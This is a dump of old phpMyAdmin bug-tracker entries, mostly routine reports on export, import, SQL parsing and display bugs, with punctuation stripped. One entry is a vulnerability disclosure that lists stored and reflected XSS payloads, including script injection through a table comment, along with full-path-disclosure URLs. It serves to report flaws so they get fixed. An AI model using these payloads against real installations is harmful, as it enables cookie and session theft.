It seems this problem affects other newer) versions of PMA too haven t tried the latest release, but it seems there is none similar bug report yet) Suppose we have this table CREATE TABLE people id INT NOT NULL, name VARCHAR 30) NOT NULL, PRIMARY KEY id) ) TYPE = MYISAM ; Now we want to change the ID column to be auto increment.
Let s use PMA.
Click on edit icon of this column, from pulldown list select auto increment , click Save.
Oops!
begin code dump from PMA SQL query ALTER TABLE `people` CHANGE `id` `id` INT 11 ) NOT NULL DEFAULT 0 AUTO INCREMENT MySQL said Documentation 1067 Invalid default value for id end code from PMA It s setting the default value of ID, which will of course fail in case of auto increment is set too.
To execute it properly, the block DEFAULT 0 should be removed and the result will be fine as expected.
Original URL https sourceforge.net p phpmyadmin bugs 2274 https sourceforge.net p phpmyadmin bugs 2274 Original author aghlbongo Found in version 2.7.0 pl1","bug"
"24444","8639","Obsolete line break format in AUTO mode on OS X.
When exporting as CSV, phpMyAdmin defaults to AUTO mode for the line break format.
When exporting to MacOS X, it uses classic MacOS style CR \r) breaks instead of the now more commonly used unix style LF \n).
CR breaks are now only rarely encountered on MacOS X.
Can you update the behaviour of AUTO on OS X please?
Original URL https sourceforge.net p phpmyadmin bugs 2275 https sourceforge.net p phpmyadmin bugs 2275 Original author coolbru Found in version 2.9.0.2","bug"
"24444","8640","Work with nonexistant pmadb.
All unrelated functionality should be working when pmadb is set and does not exists.
Right now user gets random errors like 1146 Table pmadb.PMA bookmark doesn t exist when creating table.
I know such setup is invalid, but it could be either determined at startup and empty pmadb or handled in all cases where we touch pmadb.
Original URL https sourceforge.net p phpmyadmin bugs 2276 https sourceforge.net p phpmyadmin bugs 2276 Original author nijel Found in version Latest Git","bug"
"24444","8641","Switching to RTL language switches frame width.
When I switch from LTR to RTL language, left frame width is kept, while navigation frame width should be kept.
Original URL https sourceforge.net p phpmyadmin bugs 2277 https sourceforge.net p phpmyadmin bugs 2277 Original author nijel Found in version Latest Git","bug"
"24444","8642","FUNCTION databaseName.AsText does not exist.
This bug may be because phpMyAdmin does not support the spatial extension to MySQL at all yet.
If so, it would be nice to support it soon.
When I try this query using phpMyAdmin SELECT AsText g) FROM `geom`; I get this error 1305 FUNCTION liveugli locations.AsText does not exist This error does not come up on the mysql command line.
Here is the table creation and insert SQL queries CREATE TABLE geom g GEOMETRY); INSERT INTO `geom` `g`) VALUES GeomFromText POINT 0 0) )); Original URL https sourceforge.net p phpmyadmin bugs 2278 https sourceforge.net p phpmyadmin bugs 2278 Original author repalviglator Found in version 2.8.0.3","bug"
"24444","8643","Database name not enclosed by backticks in USE statements.
When I have a database that contains for example a dash in its name, the exported file does not have backticks `` around the database name in the USE statement.
Therefore, the SQL fails.
Original URL https sourceforge.net p phpmyadmin bugs 2279 https sourceforge.net p phpmyadmin bugs 2279 Original author timcn Found in version 2.9.1 rc1","bug"
"24444","8644","place fieldnames in first row doesn t work.
Found the bug in version 2.9.0.1.
Updated to 2.9.0.2 to see whether it may have allready been fixed, but the bug is still there.
Ticking the checkbox place fieldnames in first row when exporting data has no effect.
Fieldnames aren t placed in the first row of the export.
Problem only seems to occur when exporting CSV Data .
When exporting CSV data for Excel or any other export the fieldnames are placed in the first row.
We re using the dutch interface language if that could have anything to do with it.
Original URL https sourceforge.net p phpmyadmin bugs 2281 https sourceforge.net p phpmyadmin bugs 2281 Original author e vix Found in version 2.9.0.2","bug"
"24444","8645","Segfaults after migrating 2.6.4 pl3 to 2.9.0.2.
After upgrading I got webserver crashes.
Running from consule i got Segmentation fault too.
I figured out, that these lines starting at line 2719) in library common.lib.php do the bad thing start foreach get defined vars ) as key = gt; value) \{ if !in array key, variables whitelist)) \{ unset key); \} \} unset key, value); end Commenting those lines out do fine.
PHP configure version 5.1.5) .
configure \ prefix= usr \ with apache=.. apache 1.3.36 \ with config file path= etc php \ enable track vars \ enable trans sid \ with zlib \ with gd= usr \ with iconv= usr \ enable mbstring \ enable sockets \ with gettext \ with xml \ with openssl \ with db4 \ enable ftp \ enable sysvsem \ enable sysvshm \ enable sysvmsg \ with freetype dir= usr lib \ with mysqli= usr local mysql bin mysql config \ with curl \ enable debug \ with mcrypt \ disable posix threads \ Attached phpinfo ) file Original URL https sourceforge.net p phpmyadmin bugs 2280 https sourceforge.net p phpmyadmin bugs 2280 Original author marrtins Found in version 2.9.0.2","bug"
"24444","8646","duplicate id label on table operations page.
The id label for the Add AUTO INCREMENT value checkbox in Copy Table and Move Table sections is the same.
The result is that clicking on the text in the Copy Table section checks and unchecks the Move Table checkbox.
Original URL https sourceforge.net p phpmyadmin bugs 2282 https sourceforge.net p phpmyadmin bugs 2282 Original author kencl Found in version 2.9.0.2","bug"
"24444","8647","Import impossible ver 2.9.0.2.
This is the same bug reported by me under [ 1473944 ] ok 2.8.1) Import impossible ver 2.8.0.3 OK in ver 2.6.4 pl4 Now it s BAD AGAIN.
The problem appears when you try to import a CSV file into the database using version 2.9.0.2 I made sure that the table was EMPTY before trying to import SO TO AVOID PROBLEMS) The problem is well documented in the bellow uploaded files.
Err.Import.2.9.0.2.Screen01.png this is a screenshot using PMA version 2.6.4 pl4 that shows the table structure.
Err.Import.2.9.0.2.Screen02.png in this screenshot using PMA version 2.6.4 pl4 you can see the settings used to import the file Err.Import.2.9.0.2.Screen03.png this is the result of the import operation.
Despite the errors at the top of the image, the important thing is the message that states Inserted rows 1072, which is the correct count if records for the table.
Err.Import.2.9.0.2.Screen04.png in this screenshot using PMA version 2.9.0.2 you can see the settings used to import the file with this version Err.Import.2.9.0.2.Screen05.png here you can see the message I got back using PMA version 2.9.0.2 Unidades.sql Is the sql to create the Unidades table.
Unidades.csv Is the file used in the import I m using WindowsXP Professional, Version 2002, Service Pack 2 MySql Server version 4.1.20 community nt MySQL Client version 3.23.49 MySQL charset UTF 8 Unicode utf8) Apache Version Apache 2.0.59 Win32) PHP Version 4.4.4 Server API Apache 2.0 Handler Apache Version Apache 2.0.59 Win32) PHP Version 4.4.4 In case there is any problem with the uploaded files I have also uploaded all the pertinent screen shots, and files used in the problem to this address http www.websprogrammer.com PmaProblems ......... where ....... is the file name, and the files are Err.Import.2.9.0.2.Screen01.png Err.Import.2.9.0.2.Screen02.png Err.Import.2.9.0.2.Screen03.png Err.Import.2.9.0.2.Screen04.png Err.Import.2.9.0.2.Screen05.png Unidades.sql Unidades.csv Original URL https sourceforge.net p phpmyadmin bugs 2283 https sourceforge.net p phpmyadmin bugs 2283 Original author yacar suscri Found in version 2.9.1 rc1","bug"
"24444","8648","export a whole db broken.
trunk 2.10 export.php 9602 2006 10 25 12 25 01Z nijel 2902 is ok) on trying to export a whole db to dbname.sql.gz from cihar.demo no compression) phpMyAdmin SQL Dump version 2.10.0 dev http www.phpmyadmin.net Host localhost Generation Time Oct 26, 2006 at 11 25 PM Server version 5.0.24 PHP Version 5.1.6 4 SET SQL MODE= NO AUTO VALUE ON ZERO ; Database `test` lt;br gt; lt;b gt;Warning lt; b gt; Invalid argument supplied for foreach ) in lt;b gt; srv http pma.cihar.com trunk config export.php lt; b gt; on line lt;b gt;461 lt; b gt; lt;br gt; Original URL https sourceforge.net p phpmyadmin bugs 2284 https sourceforge.net p phpmyadmin bugs 2284 Original author windkiel Found in version Latest Git","bug"
"24444","8649","If use a keyword as table alias, MySQL Parser can t get it.
If use a keyword as table alias, MySQL Parser can t get it SELECT FROM TABLE status WHERE id =1 Analyze Info Array [0] = gt; Array [querytype] = gt; SELECT [select expr clause] = gt; FROM table status [position of first select] = gt; 0 [from clause] = gt; [group by clause] = gt; [order by clause] = gt; [having clause] = gt; [where clause] = gt; id = 1 [where clause identifiers] = gt; Array [0] = gt; id ) [unsorted query] = gt; [queryflags] = gt; Array ) [select expr] = gt; Array ) [table ref] = gt; Array ) [foreign keys] = gt; Array ) [create table fields] = gt; Array ) [section before limit] = gt; select FROM table status WHERE id = 1 [section after limit] = gt; ) ) In Analyze Info , [table ref] miss status .
Original URL https sourceforge.net p phpmyadmin bugs 2285 https sourceforge.net p phpmyadmin bugs 2285 Original author honestqiao Found in version 2.9.0.2","bug"
"24444","8650","export to CSV does not include field names in first row.
If I export a table as CSV, the checkbox Put fields names in the first row is ignored.
No fields names are written to the ouput.
phpMyAdmin 2.9.0.2 MySQL 4.0.18 PHP 4.3.10 Original URL https sourceforge.net p phpmyadmin bugs 2286 https sourceforge.net p phpmyadmin bugs 2286 Original author thuttere Found in version 2.9.0.2","bug"
"24444","8651","missing linked tables error should not be error.
Hi!
I ve already seen quite some users who were confused by my phpMyAdmin installation showing Error The additional features for working with linked tables have been deactivated.
To find out why click here.
I don t think this is an error since that feature is entirely optional.
Can t it be marked as a Notice or something like that?
And preferedly not in red.
That would match the message better I think.
Thanks.
Original URL https sourceforge.net p phpmyadmin bugs 2287 https sourceforge.net p phpmyadmin bugs 2287 Original author kink Found in version 2.9.0.3","bug"
"24444","8652","problem on 64 bit systems.
phpmyadmin 2.9.0.3 and below Mysql 4.1.14 5.1.11 Php version 4.3.10 Apache V2.0.52 Platform HP OpenVMS Alpha 7.3 2 When a server variable numeric is longer than 15 digits, numeric functions such as is numeric stop php execution and result in a partitial page of server variables.
For example, on some 64 bit platforms the value for variable max join size is 18446744073709551615 which exceeds the precision of php s double data type.
Passing such a value to any numeric function like is numeric will cause php execution to quit and result in an incomplete display of server variables and no page footer.
Example code for one possible quick fix lt;td class= value gt; lt;?php original line if strlen value) lt; 16) \{ new line original lines if is numeric value)) \{ echo PMA formatNumber value, 0); is numeric = true; \} else \{ echo htmlspecialchars value); is numeric = false; \} \} else \{ new lines... echo htmlspecialchars value); is numeric = false; \} ?
gt; lt; td gt; join original code Original URL https sourceforge.net p phpmyadmin bugs 2288 https sourceforge.net p phpmyadmin bugs 2288 Original author karcher Found in version 2.9.0.3","bug"
"24444","8653","export fail cannot redeclare with php 5.2.0.
With php 5.2.0 Cannot export anything.. csv, excel, etc...
When trying, receiving this error Fatal error Cannot redeclare ) in data www phpmyadmin htdocs libraries export sql.php on line 137 line 137 goes function PMA exportComment text) Original URL https sourceforge.net p phpmyadmin bugs 2289 https sourceforge.net p phpmyadmin bugs 2289 Original author woodspire Found in version 2.9.0.2","bug"
"24444","8654","cfg[ DefaultConnectionCollation ] ignored.
phpmyadmin 2.9.0.3 Mysql 4.1.14 Php version 4.3.10 Apache V2.0.52 Platform HP OpenVMS Alpha 7.3 2 When the cfg[ DefaultConnectionCollation ] is set in config.inc.php is has no effect.
E.g.
cfg[ DefaultConnectionCollation ] = latin1 swedish ci ; will not change the value from the default utf8 unicode ci set in .
libraries config.default.php after all PMA cookies have been deleted and the URL query string cleared).
Changing the value in config.default.php will be effective.
Original URL https sourceforge.net p phpmyadmin bugs 2290 https sourceforge.net p phpmyadmin bugs 2290 Original author karcher Found in version 2.9.0.3","bug"
"24444","8655","Wrong text colour while browsing in some themes.
Hi, Me again, I think I found something that needs to be not like it is now.
For school we needed InnoDB, so I made MySQL ready for InnoDB.
And when you take a look at the screenshot you see something in blue surrounded.
All 3 tables in the screenshot are MyIsam, but the sum of that is InnoDB, I think it needs to be MyIsam ) And what about some skins displaying 2 times the Open new phpMyAdmin window?
Is that an easy fix to do?
I did that once but can t find I quickly.
And I found a fix for the Artic Ocean skin and probably ALL others) for the disappearing table text when hovering over or when the rows are selected.
I think all skins on SVN have the same issue, it is a very irritating one.
To reproduce, just try another skin, other than original and select a row in a table.
The black text dissapears.
The fix for this is 1\.
Open themes\SKINNAME\css\theme right.css.php 2\.
At the end of the table section, add give the font in the tables a black color then you can see the values in the tables when you are hovering and when they are selected by checkbox all other font colors are overwritten ok td \{ color 000000; \} Now all values are always displayed, all other styles be the same.
Or maybe this needs to be placed on top of the table styles, so other styles overwrite the default black color?
I think so.
Have a nice day and place read about the skin issues.
Happy developing!
Original URL https sourceforge.net p phpmyadmin bugs 2291 https sourceforge.net p phpmyadmin bugs 2291 Original author animatrix84","bug"
"24444","8656","broken download link.
when i go to http www.phpmyadmin.net home page downloads.php and click on phpMyAdmin 2.9.1 rc2 ... tar.bz2 i get the following error from sf.net Could not read file.
Go back.
home ftp pub sourceforge p ph phpmyadmin phpMyAdmin 2.9.1 rc2.tar.bz2 Nov 04, 2006 09 55 Original URL https sourceforge.net p phpmyadmin bugs 2292 https sourceforge.net p phpmyadmin bugs 2292 Original author windkiel","bug"
"24444","8657","Export fails with query functions.
Using phpMyAdmin 2.9.0.3 and the export feature seems to fail with query functions such as CONCAT ).
To replicate the issue try the following query SELECT firstname, lastname, CONCAT firstname, , lastname) as name from Members Original URL https sourceforge.net p phpmyadmin bugs 2293 https sourceforge.net p phpmyadmin bugs 2293 Original author richard lee","bug"
"24444","8658","Undefined index designer coords.
After SVN update I get Notice Undefined index designer coords in phpMyAdmin pmd get info.php on line 135 Original URL https sourceforge.net p phpmyadmin bugs 2294 https sourceforge.net p phpmyadmin bugs 2294 Original author nijel","bug"
"24444","8659","Untranslated messages in Designer.
At least pmd pdf.php is not translatable.
Original URL https sourceforge.net p phpmyadmin bugs 2295 https sourceforge.net p phpmyadmin bugs 2295 Original author nijel","bug"
"24444","8660","double column and disappearing buttons.
As per the forum suggestion, let me file a bug report for the double column issue.
This is related to the disappearing edit buttons issue which I will explain later).
phpMyAdmin 2.9.0.3 all languages MySQL 5.0.26 PHP 4.4.4 no Suhosin patch) MySQL client version 5.0.26 FreeBSD 4.11 STABLE Ever since upgrading to MySQL 5.0.26 problem never occured with MySQL 4.0.x), I get double column names in sort and edit queries; MySQL bumbs out, like SELECT FROM `useraddresses` WHERE `user id`.`user id` =5772 AND `is remote`.`is remote` =0 AND `piped user`.`piped user` = 0 AND `forward user`.`forward user` = 0 ; MySQL said 1054 Unknown column user id.user id in where clause Allegedly, if I understood the coders intention properly, they try and include the table name as much as possible for JOIN, I presume).
In my case, WHERE useraddresses.user id =5772 And so forth.
But you wind up just getting your column name repeated.
There seems to be some error in the fields meta logic.
Somewhere along the line, meta gt;table gets set to the column name.
In PMA getUvaCondition, for instance, meta gt;table is already equal to the column name.
And because it gets set to the column name, the edit buttons disappear in display tbl.lib.php, in if is link fields meta[ i] gt;table == || fields meta[ i] gt;table != prev table)) \{ for example.
It is supposed to disable edit lnk when the table name changes JOIN?).
But, instead, with meta gt;table set to the column name, the edit buttons just get disabled immediately when the next COLUMN field differs from the previous.
The result is that I now only get edit buttons on a table with only 1 column.
So, the solution, it seems, is in finding out where meta gt;table gets inadvertently set to the column name.
P.S.
The aforementioned queries I make are the result of pressing Browse on table and edit on a row entry.
Thanks, Mark Original URL https sourceforge.net p phpmyadmin bugs 2296 https sourceforge.net p phpmyadmin bugs 2296 Original author meimeiriver Found in version 2.9.0.3","bug"
"24444","8661","` character missing in USE export.
When I choose databases export tables datas, in USE line, the character ` is missed.
Without this, the database name with character can t be imported.
Original URL https sourceforge.net p phpmyadmin bugs 2297 https sourceforge.net p phpmyadmin bugs 2297 Original author gmludo Found in version 2.6.1","bug"
"24444","8662","Division by 0 in serve status.php.
SVN trunk revision 9689 In server status.php, line 125 and line 129 server status[ Key write ratio ] = 100 server status[ Key writes ] server status[ Key write requests ]; ... server status[ Key read ratio ] = 100 server status[ Key reads ] server status[ Key read requests ]; In case that server status[ Key write requests ] or server status[ Key read requests ] are zero there is Division by zero warning by the php engine.
Suggestion first check for zero devider and in such case the Key XXXX ratio might be set to undefined or s.th.
similar.
Original URL https sourceforge.net p phpmyadmin bugs 2298 https sourceforge.net p phpmyadmin bugs 2298 Original author gtalev Found in version Latest Git","bug"
"24444","8663","Unzip encrypt detection bug.
if flags GPF) lt; gt; 0 in ZIP, raising error encrypt not supported .
lines 280 281 of unzip.lib.php contains that code Check if data is encrypted bE = aP[ GPF ] 0x0001) ?
TRUE FALSE; I think, instead of must be , else if flags GPF) lt; gt; 0, raising error encrypt not supported ; Original URL https sourceforge.net p phpmyadmin bugs 2299 https sourceforge.net p phpmyadmin bugs 2299 Original author dmitry ukolov Found in version 2.9.1","bug"
"24444","8664","export table structure Postgresql integer field.
phpMyAdmin SQL Dump version 2.9.0.3 Debian 1 Server version 5.0.24 PHP Version 5.1.6 1 debian testing etch) Linux host1 2.6.17 2 686 1 SMP Wed Sep 13 16 34 10 UTC 2006 i686 GNU Linux Table structure for table `cards` CREATE TABLE cards ID int 11) NOT NULL, [..] will make psql return an error message ID int 11) NOT NULL Mysql 5.0 supports int n) , see the reference INT[ M)] [UNSIGNED] [ZEROFILL], mysql documentation refman 5.0 en.html chapter data types.html numeric type overview On contrast postgresql seems to accept int only.
Therefore phpmyadmins export [export gt; sql compatibility mode postgresql] should be changed accordingly.
Original URL https sourceforge.net p phpmyadmin bugs 2300 https sourceforge.net p phpmyadmin bugs 2300 Original author commissario","bug"
"24444","8665","Wrong error message on creating foreign key.
Hello, In relation Relation view , when trying to create new foreign key and the referred field is not of the same type, the No index defined!
field name) is displayed although the index exists.
Original URL https sourceforge.net p phpmyadmin bugs 2301 https sourceforge.net p phpmyadmin bugs 2301 Original author gurdiga Found in version 2.9.1","bug"
"24444","8666","css comments misprint.
marked tbale rows table tr.marked th, table tr.marked \{ background FFCC99; color 000000; \} tbale == table ) Original URL https sourceforge.net p phpmyadmin bugs 2302 https sourceforge.net p phpmyadmin bugs 2302 Original author nofx2 Found in version 2.9.1","bug"
"24444","8667","last insert id message wrong.
tetx follows as comment fixed with font size) Original URL https sourceforge.net p phpmyadmin bugs 2303 https sourceforge.net p phpmyadmin bugs 2303 Original author cybot tm Found in version Latest Git","bug"
"24444","8668","PhpMyAdmin all version multiples vulnerability.
product phpmyadmin all version bug xss full path disclosure global risk high xss post 1) create a table , with whatever name , when it s done , go to operation db operations.php) and add a comment on your table with lt; textarea gt; gt; lt;script gt;alert document.cookie) lt; script gt; the alert is only to show the xss is working ...) this is a serious security issue , because it s a permanent xss , when you log in phpmyadmin you will get your cookie stealed directly without looking at the attacker table.
2) phpmyadmin db create.php variables token=your token reload=1 db=[double xss 2 followed xss)] 3) phpmyadmin db operations.php variables db collation=latin1 swedish ci db copy=true db=prout token=your token newname=[xss] 4) phpmyadmin querywindow.php token=your token db= table= query history latest=[xss] query history latest db=[xss] querydisplay tab=[xss] querydisplay tab xss get http site.com phpmyadmin sql.php?db=information schema token=your token goto=db details structure.php table=CHARACTER SETS pos= lt; textarea gt; gt; lt;script gt;alert document.cookie) lt; script gt; note if there s a token= on this string ,it s because you need it , so replace this one with yours .
full path disclosure scripts check lang.php themes darkblue orange layout.inc.php index.php?lang[]= index.php?target[]= index.php?db[]= index.php?goto[]= left.php?server[]= index.php?table[]= server databases.php?token=your token sort by= index.php?db=information schema token=your token tbl group[]= db printview.php?db= sql.php?back[]= Original URL https sourceforge.net p phpmyadmin bugs 2304 https sourceforge.net p phpmyadmin bugs 2304 Original author securfrog","bug"
"24444","8669","scripts upgrade.pl not working fix available.
Hi, problem is with upgrade.pl script.
It s very nice to have possibility to upgrade automatically.
So, the problem is with version number http phpmyadmin.net home page version.php 2.9.1.1 and the script is trying to work with filename like phpMyAdmin 2.9.1.1.tar.gz but in latest version file all files are with suffix all languages You need to change filename and directory calculation from filename = phpMyAdmin .
version .
.tar.gz ; directory = phpMyAdmin .
version; to filename = phpMyAdmin .
version .
all languages.tar.gz ; directory = phpMyAdmin .
version.
all languages ; and it should work.
Thank You for this good and helpful script!
Hope to see this fix in next release!
Original URL https sourceforge.net p phpmyadmin bugs 2305 https sourceforge.net p phpmyadmin bugs 2305 Original author linasg Found in version Latest Git","bug"
"24444","8670","Wrong DB table name in left navigation panel.
rename database table name with underbar ending right now... table name will be displayed just like folder..
Original URL https sourceforge.net p phpmyadmin bugs 2306 https sourceforge.net p phpmyadmin bugs 2306 Original author facehan Found in version 2.9.1.1","bug"
"24444","8671","JS error while switching tabs.
Warning reference to undefined property window.parent.frame content.id Source File http pma.cihar.com trunk config tbl sql.php?db=phpmyadmin table=pma bookmark token=a941d4b4bfbd84c48f9961fc44e41836 goto=tbl structure.php back=tbl structure.php Line 164 Original URL https sourceforge.net p phpmyadmin bugs 2307 https sourceforge.net p phpmyadmin bugs 2307 Original author nijel","bug"
"24444","8672","ignore checkbox not unchecked for ENUM.
when inserting new datat using Insert tab the ignore checkbox is not unchecked when changing the radio buttons for an enum field Original URL https sourceforge.net p phpmyadmin bugs 2308 https sourceforge.net p phpmyadmin bugs 2308 Original author cybot tm Found in version Latest Git","bug"
"24444","8673","Incorrect HTML entities in SQL display.
If I do a search from the SQL window that contains a gt; , it gets escaped incorrectly when displayed with the results, for example SELECT FROM table WHERE status gt; 1; is displayed as SELECT FROM table WHERE status gt; 1; i.e.
there is a stray space inside the HTML entity.
This also suggests that you re using a custom function rather than htmlentities ).
Original URL https sourceforge.net p phpmyadmin bugs 2310 https sourceforge.net p phpmyadmin bugs 2310 Original author coolbru Found in version 2.9.1","bug"
"24444","8674","Browse distinct values and backquote in field name.
I ve create a new table but have errorly inserted a ` sign in a field field name .
First error a table is created!
After that I wana edit and remove this character but an error message occured SELECT COUNT ) AS `Rekordxc3xb3w` , `id`` FROM ` db1 zamowienia ` GROUP BY ` id `` ORDER BY `id`` 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near GROUP BY `id`` ORDER BY `id`` at line 1 PHP 4.4.4 MySQL 4.1.21 Browser Firefox 1.5.0.7 Original URL https sourceforge.net p phpmyadmin bugs 2309 https sourceforge.net p phpmyadmin bugs 2309 Original author tomko20 Found in version 2.9.0.3","bug"
"24444","8675","Missing HTML Entity in db details structure.php.
db details structure.php Line 409 410 .
lt;dfn title= .
sprintf strDefaultEngine, default engine) .
gt; .
default engine .
lt; th gt; .
\n ; should be .
lt;dfn title= .
sprintf strDefaultEngine, default engine) .
gt; .
default engine .
lt; dfn gt; lt; th gt; .
\n ; dfn tag was not closed!
id fix it myself but not enough experience with cvs!
Original URL https sourceforge.net p phpmyadmin bugs 2311 https sourceforge.net p phpmyadmin bugs 2311 Original author davecarlson Found in version 2.9.1.1","bug"
"24444","8676","MySQL Reserved Words EXPORT.
phpMyAdmin Version 2.9.0 rc1 MySQL Version 4.1.16 PHP Version 5.1.6 It appears as if when exporting table data with column names such as order and group mysql reserved words) the resulting SQL insert statements) become broken.
I searched the bug tracker and could not find a report of any similar bugs.
Maybe this is something that has been fixed in later versions.
In any event... Definitely, not a major bug.
Great product and great job guys!
Adam Original URL https sourceforge.net p phpmyadmin bugs 2312 https sourceforge.net p phpmyadmin bugs 2312 Original author amschroeder Found in version 2.9.0 rc1","bug"
"24444","8677","export from 4.1 > 4.0 looses auto increment.
If you export table structures from a mysql 4.1 database and you set the export to mysql 4.0 SQL compatibility mode, it looses the auto increment settings for fields who have this set as extra .
This problem has existed at least as far back as phpmyadmin 2.8.
Original URL https sourceforge.net p phpmyadmin bugs 2313 https sourceforge.net p phpmyadmin bugs 2313 Original author embeejay","bug"
"24444","8678","Grant all privileges on wildcard name.
This feature does not work as intended, due to a missing backslash.
Original URL https sourceforge.net p phpmyadmin bugs 2314 https sourceforge.net p phpmyadmin bugs 2314 Original author lem9 Found in version 2.10.0.2","bug"
"24444","8679","Copy table to database.table) always fails.
Hi, I can t copy a table from one DB to another, it will fail with 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 57DEFAULT CHARSET = latin1 at line 5 The problem is that the create table command is missing an space CREATE TABLE `de chat4`.`test` `id` int 7 ) NOT NULL AUTO INCREMENT , `permission id` int 10 ) NOT NULL default 0 , `titel` varchar 100 ) NOT NULL default 0 , `beschreibung` varchar 255 ) NOT NULL default , PRIMARY KEY `id` ) ) ENGINE = MYISAM AUTO INCREMENT = 57DEFAULT CHARSET = latin1 last line, the number after AUTO INCREMENT should be follwed by a space!)
My Version is 2.6.2 Debian 3sarge3 on MySQL 5.0.27 Debian 0.dotdeb.1 log Hope you fix that soon, Cheers, Eike Original URL https sourceforge.net p phpmyadmin bugs 2315 https sourceforge.net p phpmyadmin bugs 2315 Original author disisit Found in version 2.6.2","bug"
"24444","8680","is binary is determined incorrectly.
tbl change.php currently uses is binary = stristr row table def[ Type ], binary ); but it should be is binary = stristr row table def[ Type ], binary ); This causes cfg[ ProtectBinary ] not to behave as expected.
Original URL https sourceforge.net p phpmyadmin bugs 2316 https sourceforge.net p phpmyadmin bugs 2316 Original author kornelpal Found in version 2.9.1.1","bug"
"24444","8681","export of stored procedures not correct.
if i create a stored procedure in `test` and do an export i get phpMyAdmin SQL Dump version 2.10.0 dev http www.phpmyadmin.net Host localhost 9306 Generation Time Dec 11, 2006 at 01 17 AM Server version 5.0.21 PHP Version 5.1.4 SET SQL MODE= NO AUTO VALUE ON ZERO ; Database `test` Table structure for table `TTT` CREATE TABLE `ttt` `FFF` varchar 222) collate latin1 german2 ci NOT NULL ) ENGINE=MyISAM DEFAULT CHARSET=latin1 COLLATE=latin1 german2 ci; Procedures DELIMITER CREATE DEFINER=`root` `l` PROCEDURE `payment` payment amount DECIMAL 6,2), payment seller id INT) BEGIN DECLARE n DECIMAL 6,2); SET n = payment amount 1.00; INSERT INTO Moneys VALUES n, CURRENT DATE); IF payment amount gt; 1.00 THEN UPDATE Sellers SET commission = commission 1.00 WHERE seller id = payment seller id; END IF; END DELIMITER ; to be able to import it again using mysql CLI after adding use `test`; of course) i have to remove before DELIMITER but import using pma fails anyway) Original URL https sourceforge.net p phpmyadmin bugs 2317 https sourceforge.net p phpmyadmin bugs 2317 Original author windkiel Found in version Latest Git","bug"
"24444","8682","Left Pane DB grouping names display wrong.
hi.
i have this type of names in my DBs.
for listing porpouses, i have named a db not real names) TODO all capitals makes this the first db listed.
then TC something TC whatever so they are displayed this way the identation will be put as lt;ident gt; cose i dont know how to put it in this web form.
TC lt;ident gt; something lt;ident gt; whatever but i have some other tables like dev some domain com dev other domain com dev somename so the listing is like TC lt;=== group name lt;ident gt; something lt;ident gt; whatever lt;blank line gt; lt;== like taking as a name of the group lt;ident gt; dev some domain com lt;ident gt; dev other domain com lt;ident gt; dev somename instead of TC lt;ident gt; something lt;ident gt; whatever dev lt;ident gt; some domain com lt;ident gt; other domain com lt;ident gt; somename like being as a grouping name separator or something.
Original URL https sourceforge.net p phpmyadmin bugs 2318 https sourceforge.net p phpmyadmin bugs 2318 Original author jpbagnon Found in version 2.9.1.1","bug"
"24444","8683","Foreign keys spanning multiple columns.
I have a table with an index spanning 3 columns which is a foreign keys.
phpmyadmin wrongly shows this as a single column foreign key on the table relations page tbl relation.php ).
I understand phpmyadmin does not yet support foreign keys for multi column indexes FAQ 3.6) but it should not display them at all instead of incorrectly.
Any idea when support for FAQ 3.6 will be added?
Thanks!
Original URL https sourceforge.net p phpmyadmin bugs 2319 https sourceforge.net p phpmyadmin bugs 2319 Original author neuhaus Found in version 2.9.1.1","bug"
"24444","8684","Deleting user with GRANT option fails.
Deleting a user that has the GRANT option set via the Remove selected users option fails because the GRANT option is not unset with a REVOKE ALL PRIVILEGES.
This can f.e.
be observed when trying to remove the root thishost user.
The used query REVOKE ALL PRIVILEGES ON .
FROM user hostname ; DROP USER user hostname ; is insufficient.
Adding a REVOKE GRANT OPTION ON .
FROM user hostname ; before the DROP USER should fix this.
Original URL https sourceforge.net p phpmyadmin bugs 2320 https sourceforge.net p phpmyadmin bugs 2320 Original author leonardjo2 Found in version 2.9.1.1","bug"
"24444","8685","auth type accepts http not HTTP .
The documentation for 2.9.1.1 says that auth type can be either HTTP , cookie , or config .
The actual code seems to only accept http , not HTTP .
Original URL https sourceforge.net p phpmyadmin bugs 2321 https sourceforge.net p phpmyadmin bugs 2321 Original author joeljkp Found in version 2.9.1.1","bug"
"24444","8686","open basedir with upload tmpdir outside.
can someone confirm filr uploads with open basedir restrictions does not work with no upload tmp dir set on Windows) open basedir = c \\htdocs ;upload tmp dir = PHP 5.2.0 mod Apach 2.0.55 Windows XP without open basedir restriction file uploads work, with or without upload tmp dir set p.s.
marc, yes i am working on this but my email account is offline since yesterday ...
Original URL https sourceforge.net p phpmyadmin bugs 2322 https sourceforge.net p phpmyadmin bugs 2322 Original author cybot tm Found in version Latest Git","bug"
"24444","8687","server databases does not show all databases.
the link Databases on main.php leads to server databases.php which only shows one of all databases where the database name only differs in case.
example from pma.cihar.com) from test and Test only Test is shown.
perhaps related if you have more than 100 databases and click on page2 or last page Warning array key exists ) [function.array key exists] The second argument should be either an array or an object in srv http pma.cihar.com trunk config server databases.php on line 225 Original URL https sourceforge.net p phpmyadmin bugs 2324 https sourceforge.net p phpmyadmin bugs 2324 Original author windkiel Found in version Latest Git","bug"
"24444","8688","PMA sendHeaderLocation ) does not support sessions fully.
can someone confirm that PMA sendHeaderLocation ) will drop the session if cookies are disabled webserver is IIS URL length is above 600 i have no IIS to check this, i just found this by accident Original URL https sourceforge.net p phpmyadmin bugs 2323 https sourceforge.net p phpmyadmin bugs 2323 Original author cybot tm","bug"
"24444","8689","export of query results data contains routine defs.
To replicate 1) open up a table and do a Search default settings) 2) near the top, in the Query results operations section, click the Export link 3) uncheck Structure , leave other settings as default 4) hit Go the definitions of all the routines procedures and functions) are exported as well.
This should not happen unless the Structure option is checked.
Actually, it should be a sub option in the Structure section.
Original URL https sourceforge.net p phpmyadmin bugs 2325 https sourceforge.net p phpmyadmin bugs 2325 Original author rob263 Found in version 2.9.1.1","bug"
"24444","8690","Nested query export problem.
When exporting information from an resultset gathered from a nested query like SELECT phases.
FROM phases WHERE phases.projectId IN SELECT projects.projectId FROM projects WHERE projects.executorId=659); After selecting all checkboxes and hitting export, the query gets converted to SELECT projects .
projectId FROM projects WHERE `phases`.`phaseId` = 2082 ) OR `phases`.`phaseId` = 2083 ) OR `phases`.`phaseId` = 2084 ) OR `phases`.`phaseId` = 2086 ) OR `phases`.`phaseId` = 2241 ) OR `phases`.`phaseId` = 2242 ) etc.... As you can see it thinks the nested query determains what needs to be exported, which is obviously not correct.
